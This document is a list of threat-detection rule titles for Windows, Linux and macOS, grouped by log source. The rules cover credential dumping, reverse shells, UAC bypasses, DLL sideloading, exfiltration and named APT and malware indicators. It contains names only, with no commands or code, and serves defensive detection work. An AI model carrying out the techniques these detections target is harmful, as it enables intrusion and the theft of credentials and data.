  • Files With System Process Name In Unsuspected Locations
  • Creation Exe for Service with Unquoted Path
  • Cred Dump Tools Dropped Files
  • WScript or CScript Dropper - File
  • Dynamic CSharp Compile Artefact
  • CSExec Service File Creation
  • Potential DCOM InternetExplorer.Application DLL Hijack
  • DLL Search Order Hijackig Via Additional Space in Path
  • Potentially Suspicious DMP/HDMP File Creation
  • Potential Persistence Attempt Via ErrorHandler.Cmd
  • Suspicious ASPX File Drop by Exchange
  • Suspicious File Drop by Exchange
  • GoToAssist Temporary Installation Artefact
  • HackTool - CrackMapExec File Indicators
  • HackTool - Typical HiveNightmare SAM File Export
  • HackTool - Dumpert Process Dumper Default File
  • HackTool - Inveigh Execution Artefacts
  • HackTool - Mimikatz Kirbi File Creation
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
  • HackTool - NPPSpy Hacktool Usage
  • HackTool - Powerup Write Hijack DLL
  • HackTool - QuarksPwDump Dump File
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
  • HackTool - SafetyKatz Dump Indicator
  • Potential Initial Access via DLL Search Order Hijacking
  • Installation of TeamViewer Desktop
  • Malicious DLL File Dropped in the Teams or OneDrive Folder
  • ISO File Created Within Temp Folders
  • ISO or Image Mount Indicator in Recent Files
  • GatherNetworkInfo.VBS Reconnaissance Script Output
  • LSASS Process Memory Dump Files
  • LSASS Process Dump Artefact In CrashDumps Folder
  • WerFault LSASS Process Memory Dump
  • Octopus Scanner Malware
  • Adwind RAT / JRAT File Artifact
  • File Creation In Suspicious Directory By Msdt.EXE
  • Uncommon File Creation By Mysql Daemon Process
  • Suspicious DotNET CLR Usage Log Artifact
  • Suspicious File Creation In Uncommon AppData Folder
  • SCR File Write Event
  • Potential Persistence Via Notepad++ Plugins
  • NTDS.DIT Created
  • NTDS.DIT Creation By Uncommon Parent Process
  • NTDS.DIT Creation By Uncommon Process
  • NTDS Exfiltration Filename Patterns
  • Office Macro File Creation
  • Potential Persistence Via Microsoft Office Add-In
  • Office Macro File Download
  • Office Macro File Creation From Suspicious Process
  • OneNote Attachment File Dropped In Suspicious Location
  • Suspicious File Created Via OneNote Application
  • New Outlook Macro Created
  • .RDP File Created by Outlook Process
  • PCRE.NET Package Temp Files
  • Suspicious Outlook Macro Created
  • Publisher Attachment File Dropped In Suspicious Location
  • Potential Persistence Via Microsoft Office Startup Folder
  • File With Uncommon Extension Created By An Office Application
  • Uncommon File Created In Office Startup Folder
  • Potential Persistence Via Outlook Form
  • Suspicious File Created In PerfLogs
  • Potential Binary Or Script Dropper Via PowerShell
  • PowerShell Script Dropped Via PowerShell.EXE
  • Malicious PowerShell Scripts - FileCreation
  • PowerShell Module File Created
  • PowerShell Module File Created By Non-PowerShell Process
  • Potential Suspicious PowerShell Module File Created
  • Potential Startup Shortcut Persistence Via PowerShell.EXE
  • PSScriptPolicyTest Creation By Uncommon Process
  • Rclone Config File Creation
  • .RDP File Created By Uncommon Application
  • Potential Winnti Dropper Activity
  • PDF File Created By RegEdit.EXE
  • RemCom Service File Creation
  • ScreenConnect Temporary Installation Artefact
  • Remote Access Tool - ScreenConnect Temporary File
  • Potential RipZip Attack on Startup Folder
  • Potential SAM Database Dump
  • Self Extraction Directive File Created In Potentially Suspicious Location
  • Windows Shell/Scripting Application File Write to Suspicious Folder
  • Windows Binaries Write Suspicious Extensions
  • Startup Folder File Write
  • Suspicious Creation with Colorcpl
  • Created Files by Microsoft Sync Center
  • Suspicious Files in Default GPO Folder
  • Suspicious Desktopimgdownldr Target File
  • Suspicious desktop.ini Action
  • Suspicious Creation TXT File in User Desktop
  • Creation of a Diagcab
  • DPAPI Backup Keys And Certificate Export Activity IOC
  • Suspicious Double Extension Files
  • Suspicious MSExchangeMailboxReplication ASPX Write
  • Suspicious Executable File Creation
  • Suspicious Get-Variable.exe Creation
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
  • Potential Homoglyph Attack Using Lookalike Characters in Filename
  • Legitimate Application Dropped Archive
  • Legitimate Application Dropped Executable
  • Legitimate Application Dropped Script
  • Suspicious LNK Double Extension File Created
  • Suspicious PFX File Creation
  • PowerShell Profile Modification
  • Suspicious PROCEXP152.sys File Created In TMP
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder
  • Potential File Extension Spoofing Using Right-to-Left Override
  • Drop Binaries Into Spool Drivers Color Folder
  • Suspicious Startup Folder Persistence
  • Suspicious Scheduled Task Write to System32 Tasks
  • Suspicious Interactive PowerShell as SYSTEM
  • TeamViewer Remote Session
  • VsCode Powershell Profile Modification
  • Windows Terminal Profile Settings Modification By Uncommon Process
  • WinSxS Executable File Creation By Non-System Process
  • LiveKD Kernel Memory Dump File Created
  • LiveKD Driver Creation
  • LiveKD Driver Creation By Uncommon Process
  • Process Explorer Driver Creation By Non-Sysinternals Binary
  • Process Monitor Driver Creation By Non-Sysinternals Binary
  • PsExec Service File Creation
  • PSEXEC Remote Execution File Artefact
  • Potential Privilege Escalation Attempt Via .Exe.Local Technique
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE
  • Hijack Legit RDP Session to Move Laterally
  • UAC Bypass Using Consent and Comctl32 - File
  • UAC Bypass Using .NET Code Profiler on MMC
  • UAC Bypass Using EventVwr
  • UAC Bypass Using IDiagnostic Profile - File
  • UAC Bypass Using IEInstal - File
  • UAC Bypass Using MSConfig Token Modification - File
  • UAC Bypass Using NTFS Reparse Point - File
  • UAC Bypass Abusing Winsat Path Parsing - File
  • UAC Bypass Using Windows Media Player - File
  • Creation of WerFault.exe/Wer.dll in Unusual Folder
  • VHD Image Download Via Browser
  • Visual Studio Code Tunnel Remote File Creation
  • Renamed VsCode Code Tunnel Execution - File Indicator
  • Potential Webshell Creation On Static Website
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
  • Wmiexec Default Output File
  • Wmiprvse Wbemcomn DLL Hijack - File
  • WMI Persistence - Script Event Consumer File Write
  • UEFI Persistence Via Wpbbin - FileCreation
  • Writing Local Admin Share
  • APT29 2018 Phishing Campaign File Indicators
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern
  • CVE-2021-26858 Exchange Exploitation
  • Suspicious Word Cab File Write CVE-2021-40444
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
  • CVE-2021-44077 POC Default Dropped File
  • Potential Devil Bait Related Indicator
  • Goofy Guineapig Backdoor IOC
  • Moriya Rootkit File Created
  • Pingback Backdoor File Indicators
  • Small Sieve Malware File Indicator Creation
  • CVE-2022-24527 Microsoft Connected Cache LPE
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
  • Potential CVE-2023-36884 Exploitation Dropped File
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
  • CVE-2023-40477 Potential Exploitation - .REV File Creation
  • Potential COLDSTEEL RAT File Indicators
  • Potential COLDSTEEL Persistence Service DLL Creation
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process
  • SNAKE Malware Kernel Driver File Indicator
  • SNAKE Malware WerFault Persistence File Creation
  • SNAKE Malware Installer Name Indicators
  • Diamond Sleet APT File Creation Indicators
  • Potential APT FIN7 Related PowerShell Script Created
  • Lace Tempest File Indicators
  • Onyx Sleet APT File Creation Indicators
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
  • ScreenConnect User Database Modification
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory
  • File Creation Related To RAT Clients
  • Potential Kapeka Decrypted Backdoor Indicator
  • Forest Blizzard APT - File Creation Activity
  • Forest Blizzard APT - JavaScript Constrained File Creation
  • ScreenConnect - SlashAndGrab Exploitation Indicators
  • DMP/HDMP File Creation
  • Python Path Configuration File Creation - Windows
  • Scheduled Task Created - FileCreation
  • Creation of an Executable by an Executable
  • VsCode Code Tunnel Execution File Indicator
  • WebDAV Temporary Local File Creation
  • File Creation by Office Applications
  • Files Dropped to Program Files by Non-Priviledged Process
windows-ps_script 184
  • Accessing Encrypted Credentials from Google Chrome Login Database
  • AzureHound PowerShell Commands
  • Execution via CL_Invocation.ps1 - Powershell
  • Execution via CL_Mutexverifiers.ps1
  • Powershell File and Directory Discovery
  • Dnscat Execution
  • PrintNightmare Powershell Exploitation
  • Suspicious Get-WmiObject
  • AADInternals PowerShell Cmdlets Execution - PsScript
  • Access to Browser Login Data
  • Potential Active Directory Enumeration Using AD Module - PsScript
  • Add Windows Capability Via PowerShell Script
  • Powershell Add Name Resolution Policy Table Rule
  • PowerShell ADRecon Execution
  • AMSI Bypass Pattern Assembly GetType
  • Potential AMSI Bypass Script Using NULL Bits
  • Silence.EDA Detection
  • Get-ADUser Enumeration Using UserAccountControl Flags
  • Potential Data Exfiltration Via Audio File
  • Automated Collection Command PowerShell
  • Windows Screen Capture with CopyFromScreen
  • Clearing Windows Console History
  • Clear PowerShell History - PowerShell
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
  • Powershell Create Scheduled Task
  • Powershell Install a DLL in System Directory
  • Registry-Free Process Scope COR_PROFILER
  • PowerShell Create Local User
  • Create Volume Shadow Copy with Powershell
  • Powershell Detect Virtualization Environment
  • DirectorySearcher Powershell Exploitation
  • Manipulation of User Computer or Group Security Principals Across AD
  • Disable Powershell Command History
  • Disable-WindowsOptionalFeature Command PowerShell
  • Potential In-Memory Execution Using Reflection.Assembly
  • Potential COM Objects Download Cradles Usage - PS Script
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
  • Dump Credentials from Windows Credential Manager With PowerShell
  • Enable Windows Remote Management
  • Potential Suspicious Windows Feature Enabled
  • Enumerate Credentials from Windows Credential Manager With PowerShell
  • Disable of ETW Trace - Powershell
  • Suspicious PowerShell Mailbox SMTP Forward Rule
  • Certificate Exported Via PowerShell - ScriptBlock
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script
  • Service Registry Permissions Weakness Check
  • Active Directory Computers Enumeration With Get-AdComputer
  • Active Directory Group Enumeration With Get-AdGroup
  • Suspicious Get-ADReplAccount
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell
  • Security Software Discovery Via Powershell Script
  • HackTool - Rubeus Execution - ScriptBlock
  • HackTool - WinPwn Execution - ScriptBlock
  • PowerShell Hotfix Enumeration
  • PowerShell ICMP Exfiltration
  • Import PowerShell Modules From Suspicious Directories
  • Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript
  • Execute Invoke-command on Remote Host
  • Powershell DNSExfiltration
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Powershell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell
  • Invoke-Obfuscation Via Stdin - Powershell
  • Invoke-Obfuscation Via Use Clip - Powershell
  • Invoke-Obfuscation Via Use MSHTA - PowerShell
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell
  • Powershell Keylogging
  • Powershell LocalAccount Manipulation
  • Suspicious PowerShell Mailbox Export to Share - PS
  • Malicious PowerShell Commandlets - ScriptBlock
  • Live Memory Dump Using Powershell
  • Malicious PowerShell Keywords
  • Modify Group Policy Settings - ScriptBlockLogging
  • Powershell MsXml COM Object
  • Malicious Nishang PowerShell Commandlets
  • NTFS Alternate Data Stream
  • Code Executed Via Office Add-in XLL File
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock
  • Potential Invoke-Mimikatz PowerShell Script
  • PowerShell Web Access Installation - PsScript
  • PowerView PowerShell Cmdlets - ScriptBlock
  • PowerShell Credential Prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell
  • PowerShell PSAttack
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
  • PowerShell Remote Session Creation
  • PowerShell Script With File Hostname Resolving Capabilities
  • Request A Single Ticket via PowerShell
  • Root Certificate Installed - PowerShell
  • Suspicious Invoke-Item From Mount-DiskImage
  • PowerShell Script With File Upload Capabilities
  • PowerShell Script Change Permission Via Set-Acl - PsScript
  • Powershell Sensitive File Discovery
  • PowerShell Set-Acl On Windows Folder - PsScript
  • Change PowerShell Policies to an Insecure Level - PowerShell
  • PowerShell ShellCode
  • Malicious ShellIntel PowerShell Commandlets
  • Detected Windows Software Discovery - PowerShell
  • Powershell Store File In Alternate Data Stream
  • Potential Persistence Via Security Descriptors - ScriptBlock
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock
  • Potential PowerShell Obfuscation Using Character Join
  • Suspicious Eventlog Clear
  • Powershell Directory Enumeration
  • Suspicious PowerShell Download - Powershell Script
  • Powershell Execute Batch Script
  • Troubleshooting Pack Cmdlet Execution
  • Extracting Information with PowerShell
  • PowerShell Get-Process LSASS in ScriptBlock
  • Suspicious GetTypeFromCLSID ShellExecute
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy
  • Suspicious PowerShell Get Current User
  • Suspicious GPO Discovery With Get-GPO
  • Suspicious Process Discovery With Get-Process
  • Suspicious Hyper-V Cmdlets
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Suspicious IO.FileStream
  • Change User Agents with WebRequest
  • Potential Keylogger Activity
  • Suspicious Get Local Groups Information - PowerShell
  • Potential Suspicious PowerShell Keywords
  • Powershell Local Email Collection
  • PowerShell Deleted Mounted Share
  • Suspicious Mount-DiskImage
  • Suspicious Connection to Remote Account
  • Suspicious New-PSDrive to Admin Share
  • Suspicious TCP Tunnel Via PowerShell Script
  • Recon Information for Export with PowerShell
  • Remove Account From Domain Admin Group
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS
  • Suspicious Get Information for SMB Share
  • Potential PowerShell Obfuscation Using Alias Cmdlets
  • Suspicious SSL Connection
  • Suspicious Start-Process PassThru
  • Suspicious Unblock-File
  • Powershell Suspicious Win32_PnPEntity
  • Replace Desktop Wallpaper by Powershell
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
  • Suspicious PowerShell WindowStyle Option
  • PowerShell Write-EventLog Usage
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging
  • Tamper Windows Defender - ScriptBlockLogging
  • Testing Usage of Uncommonly Used Port
  • Powershell Timestomp
  • Powershell Token Obfuscation - Powershell
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell
  • Potential Persistence Via PowerShell User Profile Using Add-Content
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS
  • Veeam Backup Servers Credential Dumping Script Execution
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock
  • Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
  • PowerShell WMI Win32_Product Install MSI
  • Windows Firewall Profile Disabled
  • Winlogon Helper DLL
  • Potential WinAPI Calls Via PowerShell Scripts
  • Windows Defender Exclusions Added - PowerShell
  • WMImplant Hack Tool
  • Powershell WMI Persistence
  • WMIC Unquoted Services Path Lookup - PowerShell
  • Suspicious X509Enrollment - Ps Script
  • Powershell XML Execute Command
  • Potential APT FIN7 POWERHOLD Execution
  • Potential POWERTRASH Script Execution
  • Lace Tempest PowerShell Evidence Eraser
  • Lace Tempest PowerShell Launcher
  • Compress-Archive Cmdlet Execution
  • Windows Mail App Mailbox Access Via PowerShell Script
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock
  • SMB over QUIC Via PowerShell Script
  • Potential Registry Reconnaissance Via PowerShell Script
  • Use Of Remove-Item to Delete File - ScriptBlock
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet
  • WinAPI Library Calls Via PowerShell Scripts
  • WinAPI Function Calls Via PowerShell Scripts
  • Execution via CL_Invocation.ps1 (2 Lines)
  • Execution via CL_Mutexverifiers.ps1 (2 Lines)
linux-process_creation 121
  • Shell Invocation via Apt - Linux
  • Scheduled Task/Job At
  • Suspicious Invocation of Shell via AWK - Linux
  • Decode Base64 Encoded Text
  • Linux Base64 Encoded Pipe to Shell
  • Bash Interactive Shell
  • BPFtrace Unsafe Option Usage
  • Enable BPF Kprobes Tracing
  • Capabilities Discovery - Linux
  • Capsh Shell Invocation - Linux
  • Remove Immutable File Attribute
  • Linux Base64 Encoded Shebang In CLI
  • Clipboard Collection with Xclip Tool
  • Clear Linux Logs
  • Cat Sudoers
  • Commands to Clear or Remove the Syslog
  • Crontab Enumeration
  • Copy Passwd Or Shadow From TMP Path
  • Remove Scheduled Cron Task/Job
  • Linux Crypto Mining Indicators
  • Curl Usage on Linux
  • Atlassian Confluence CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation
  • DD File Overwrite
  • Potential Linux Process Code Injection Via DD Utility
  • Ufw Force Stop Using Ufw-Init
  • Linux Doas Tool Execution
  • Shell Invocation via Env Command - Linux
  • ESXi Network Configuration Discovery Via ESXCLI
  • ESXi Admin Permission Assigned To Account Via ESXCLI
  • ESXi Storage Information Discovery Via ESXCLI
  • ESXi Syslog Configuration Change Via ESXCLI
  • ESXi System Information Discovery Via ESXCLI
  • ESXi Account Creation Via ESXCLI
  • ESXi VM List Discovery Via ESXCLI
  • ESXi VM Kill Via ESXCLI
  • ESXi VSAN Information Discovery Via ESXCLI
  • File and Directory Discovery - Linux
  • File Deletion
  • Shell Execution via Find - Linux
  • Shell Execution via Flock - Linux
  • Shell Execution GCC - Linux
  • Shell Execution via Git - Linux
  • OS Architecture Discovery Via Grep
  • Group Has Been Deleted Via Groupdel
  • Install Root Certificate
  • Suspicious Package Installed - Linux
  • Flush Iptables Ufw Chain
  • Local System Accounts Discovery - Linux
  • Local Groups Discovery - Linux
  • Potential GobRAT File Discovery Via Grep
  • Named Pipe Created Via Mkfifo
  • Potentially Suspicious Named Pipe Created Via Mkfifo
  • Mount Execution With Hidepid Parameter
  • Potential Netcat Reverse Shell Execution
  • Shell Execution via Nice - Linux
  • Nohup Execution
  • Suspicious Nohup Execution
  • OMIGOD SCX RunAsProvider ExecuteScript
  • OMIGOD SCX RunAsProvider ExecuteShellCommand
  • Potential Perl Reverse Shell Execution
  • Potential PHP Reverse Shell
  • Pnscan Binary Data Transmission Activity
  • Connection Proxy
  • Python Spawning Pretty TTY Via PTY Module
  • Python Reverse Shell Execution Via PTY And Socket Modules
  • Inline Python Execution - Spawn Shell Via OS System Library
  • Remote Access Tool - Team Viewer Session Started On Linux Host
  • Linux Remote System Discovery
  • Linux Package Uninstall
  • Shell Execution via Rsync - Linux
  • Suspicious Invocation of Shell via Rsync
  • Potential Ruby Reverse Shell
  • Scheduled Cron Task/Job - Linux
  • Security Software Discovery - Linux
  • Disabling Security Tools
  • Disable Or Stop Services
  • Setuid and Setgid
  • Shell Invocation Via Ssh - Linux
  • Potential Linux Amazon SSM Agent Hijacking
  • Sudo Privilege Escalation CVE-2019-14287
  • Chmod Suspicious Directory
  • Container Residence Discovery Via Proc Virtual FS
  • Suspicious Curl File Upload - Linux
  • Suspicious Curl Change User Agents - Linux
  • Docker Container Discovery Via Dockerenv Listing
  • Potentially Suspicious Execution From Tmp Folder
  • Potential Discovery Activity Using Find - Linux
  • Suspicious Git Clone - Linux
  • History File Deletion
  • Print History File Contents
  • Linux HackTool Execution
  • Potential Container Discovery Via Inodes Listing
  • Interactive Bash Suspicious Children
  • Suspicious Java Children Processes
  • Linux Network Service Scanning Tools Execution
  • Linux Shell Pipe to Shell
  • Linux Recon Indicators
  • Potential Suspicious Change To Sensitive/Critical Files
  • Execution Of Script Located In Potentially Suspicious Directory
  • Shell Execution Of Process Located In Tmp Directory
  • System Information Discovery
  • System Network Connections Discovery - Linux
  • System Network Discovery - Linux
  • Touch Suspicious Service File
  • Triple Cross eBPF Rootkit Execve Hijack
  • Triple Cross eBPF Rootkit Install Commands
  • User Has Been Deleted Via Userdel
  • User Added To Root/Sudoers Group Using Usermod
  • Vim GTFOBin Abuse - Linux
  • Linux Webshell Indicators
  • Download File To Potentially Suspicious Directory Via Wget
  • Potential Xterm Reverse Shell
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
  • UNC4841 - SSL Certificate Exfiltration Via Openssl
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
  • UNC4841 - Potential SEASPY Execution
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
  • Terminate Linux Process Via Kill
  • Process Discovery
windows-image_load 120
  • Alternate PowerShell Hosts - Image
  • Suspicious Load of Advapi31.dll
  • SCM DLL Sideload
  • Svchost DLL Search Order Hijack
  • Possible Process Hollowing Image Loading
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word
  • PowerShell Execution
  • DLL Loaded From Suspicious Location Via Cmspt.EXE
  • Amsi.DLL Loaded Via LOLBIN Process
  • Potential Azure Browser SSO Abuse
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32
  • CredUI.DLL Loaded By Uncommon Process
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded
  • PCRE.NET Package Image Load
  • Load Of RstrtMgr.DLL By A Suspicious Process
  • Load Of RstrtMgr.DLL By An Uncommon Process
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
  • Time Travel Debugging Utility Usage - Image
  • PowerShell Core DLL Loaded By Non PowerShell Process
  • Suspicious Volume Shadow Copy Vssapi.dll Load
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
  • Suspicious Volume Shadow Copy VSS_PS.dll Load
  • HackTool - SILENTTRINITY Stager DLL Load
  • HackTool - SharpEvtMute DLL Load
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
  • Unsigned Image Loaded Into LSASS Process
  • CLR DLL Loaded Via Office Applications
  • DotNET Assembly DLL Loaded Via Office Application
  • Active Directory Parsing DLL Loaded Via Office Application
  • GAC DLL Loaded Via Office Applications
  • Microsoft Excel Add-In Loaded From Uncommon Location
  • Active Directory Kerberos DLL Loaded Via Office Application
  • Microsoft VBA For Outlook Addin Loaded Via Outlook
  • VBA DLL Loaded Via Office Application
  • PowerShell Core DLL Loaded Via Office Application
  • Remote DLL Load Via Rundll32.EXE
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
  • Potential 7za.DLL Sideloading
  • Abusable DLL Potential Sideloading From Suspicious Location
  • Potential Antivirus Software DLL Sideloading
  • Potential appverifUI.DLL Sideloading
  • Aruba Network Service Potential DLL Sideloading
  • Potential AVKkid.DLL Sideloading
  • Potential CCleanerDU.DLL Sideloading
  • Potential CCleanerReactivator.DLL Sideloading
  • Potential Chrome Frame Helper DLL Sideloading
  • Potential DLL Sideloading Via ClassicExplorer32.dll
  • Potential DLL Sideloading Via comctl32.dll
  • Potential DLL Sideloading Using Coregen.exe
  • Potential DLL Sideloading Of DBGCORE.DLL
  • System Control Panel Item Loaded From Uncommon Location
  • Potential DLL Sideloading Of DBGHELP.DLL
  • Potential DLL Sideloading Of DbgModel.DLL
  • Potential EACore.DLL Sideloading
  • Potential Edputil.DLL Sideloading
  • Potential System DLL Sideloading From Non System Locations
  • Potential Goopdate.DLL Sideloading
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
  • Potential Iviewers.DLL Sideloading
  • Potential DLL Sideloading Via JsSchHlp
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
  • Potential Libvlc.DLL Sideloading
  • Potential Mfdetours.DLL Sideloading
  • Unsigned Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of MpSvc.DLL
  • Potential DLL Sideloading Of MsCorSvc.DLL
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders
  • Microsoft Office DLL Sideload
  • Potential Python DLL SideLoading
  • Potential Rcdll.DLL Sideloading
  • Potential RjvPlatform.DLL Sideloading From Default Location
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location
  • Potential RoboForm.DLL Sideloading
  • Potential ShellDispatch.DLL Sideloading
  • DLL Sideloading Of ShellChromeAPI.DLL
  • Potential SmadHook.DLL Sideloading
  • Potential SolidPDFCreator.DLL Sideloading
  • Third Party Software DLL Sideloading
  • Fax Service DLL Search Order Hijack
  • Potential Vivaldi_elf.DLL Sideloading
  • VMGuestLib DLL Sideload
  • VMMap Signed Dbghelp.DLL Potential Sideloading
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading
  • Potential DLL Sideloading Via VMware Xfer
  • Potential Waveedit.DLL Sideloading
  • Potential Wazuh Security Platform DLL Sideloading
  • Potential Mpclient.DLL Sideloading
  • Potential WWlib.DLL Sideloading
  • Windows Spooler Service Suspicious Binary Load
  • Unsigned Module Loaded by ClickOnce Application
  • DLL Load By System Process From Suspicious Locations
  • Python Image Load By Non-Python Process
  • DotNet CLR DLL Loaded By Scripting Applications
  • Unsigned DLL Loaded by Windows Utility
  • Suspicious Unsigned Thor Scanner Execution
  • UAC Bypass Using Iscsicpl - ImageLoad
  • UAC Bypass With Fake DLL
  • WMIC Loading Scripting Libraries
  • Wmiprvse Wbemcomn DLL Hijack
  • WMI Persistence - Command Line Event Consumer
  • Suspicious WSMAN Provider Image Loads
  • FoggyWeb Backdoor DLL Loading
  • Pingback Backdoor DLL Loading Activity
  • APT PRIVATELOG Image Load Pattern
  • Potential COLDSTEEL Persistence Service DLL Load
  • Malicious DLL Load By Compromised 3CXDesktopApp
  • DLL Names Used By SVR For GraphicalProton Backdoor
  • Diamond Sleet APT DLL Sideloading Indicators
  • Lazarus APT DLL Sideloading Activity
  • Potential CSharp Streamer RAT Loading .NET Executable Image
  • Kapeka Backdoor Loaded Via Rundll32.EXE
  • Potential Raspberry Robin Aclui Dll SideLoading
  • Amsi.DLL Load By Uncommon Process
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
  • System Drawing DLL Load
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
  • Microsoft Excel Add-In Loaded
  • Microsoft Word Add-In Loaded
  • WMI Module Loaded By Uncommon Process
  • Mimikatz In-Memory
macos-process_creation 67
  • User Added To Admin Group - MacOS
  • MacOS Scripting Interpreter AppleScript
  • Decode Base64 Encoded Text -MacOs
  • Binary Padding - MacOS
  • File Time Attribute Change
  • Hidden Flag Set On File/Directory Via Chflags - MacOS
  • Indicator Removal on Host - Clear Mac System Logs
  • Clipboard Data Collection Via OSAScript
  • Creation Of A Local User Account
  • Hidden User Creation
  • Credentials from Password Stores - Keychain
  • System Integrity Protection (SIP) Disabled
  • System Integrity Protection (SIP) Enumeration
  • Disable Security Tools
  • User Added To Admin Group Via Dscl
  • User Added To Admin Group Via DseditGroup
  • Root Account Enable Via Dsenableroot
  • File and Directory Discovery - MacOS
  • Credentials In Files
  • GUI Input Capture - macOS
  • Disk Image Creation Via Hdiutil - MacOS
  • Disk Image Mounting Via Hdiutil - MacOS
  • Suspicious Installer Package Child Process
  • System Information Discovery Using Ioreg
  • JAMF MDM Potential Suspicious Child Process
  • JAMF MDM Execution
  • JXA In-memory Execution Via OSAScript
  • Launch Agent/Daemon Execution Via Launchctl
  • Local System Accounts Discovery - MacOs
  • Local Groups Discovery - MacOs
  • MacOS Network Service Scanning
  • Network Sniffing - MacOs
  • File Download Via Nscurl - MacOS
  • Suspicious Microsoft Office Child Process - MacOS
  • OSACompile Run-Only Execution
  • Payload Decoded and Decrypted via Built-in Utilities
  • Potential Persistence Via PlistBuddy
  • Remote Access Tool - Team Viewer Session Started On MacOS Host
  • Macos Remote System Discovery
  • Scheduled Cron Task/Job - MacOs
  • Screen Capture - macOS
  • Security Software Discovery - MacOs
  • Space After Filename - macOS
  • Split A File Into Pieces
  • Osacompile Execution By Potentially Suspicious Applet/Osascript
  • Suspicious Browser Child Process - MacOS
  • Suspicious Execution via macOS Script Editor
  • Potential Discovery Activity Using Find - MacOS
  • Suspicious History File Operations
  • Potential In-Memory Download And Compile Of Payloads
  • Suspicious MacOS Firmware Activity
  • System Network Discovery - macOS
  • System Information Discovery Using sw_vers
  • User Added To Admin Group Via Sysadminctl
  • Guest Account Enabled Via Sysadminctl
  • System Information Discovery Via Sysctl - MacOS
  • System Information Discovery Using System_Profiler
  • System Network Connections Discovery - MacOs
  • System Shutdown/Reboot - MacOs
  • Potential Base64 Decoded From Images
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS
  • Time Machine Backup Disabled Via Tmutil - MacOS
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS
  • Potential WizardUpdate Malware Infection
  • Gatekeeper Bypass via Xattr
  • Potential XCSSET Malware Infection
  • Clipboard Data Collection Via Pbpaste
windows-network_connection 65
  • Microsoft Binary Github Communication
  • Suspicious Non-Browser Network Communication With Reddit API
  • Suspicious Epmap Connection
  • Network Connection Initiated By AddinUtil.EXE
  • Uncommon Connection to Active Directory Web Services
  • Uncommon Network Connection Initiated By Certutil.EXE
  • Outbound Network Connection Initiated By Cmstp.EXE
  • Outbound Network Connection Initiated By Microsoft Dialer
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
  • Network Connection Initiated To BTunnels Domains
  • Network Connection Initiated To Cloudflared Tunnels Domains
  • Network Communication With Crypto Mining Pool
